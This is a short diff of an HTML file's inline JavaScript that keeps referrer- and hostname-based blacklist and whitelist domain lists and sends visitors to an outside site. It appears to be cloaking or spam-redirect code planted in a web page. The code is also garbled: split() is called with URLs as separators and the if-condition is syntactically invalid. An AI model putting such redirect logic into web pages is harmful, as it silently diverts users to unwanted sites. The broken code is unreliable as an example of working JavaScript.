--- a/encodee.html
+++ b/encodee.html
@@ -114,7 +114,7 @@ var blackdomains = "google.com";
 var blacklist = blackdomains.split("https://www.wicketgoal.com"); 
 
 var whitedomains = " ";
-var whitelist = whitedomains.split("https://26.reducemyweight.net");
+var whitelist = whitedomains.split(" ");
 
 if (isInArray(hostname, blacklist)!document.referrer) {
   document.location.href = " https://www.yosin-tv.net";
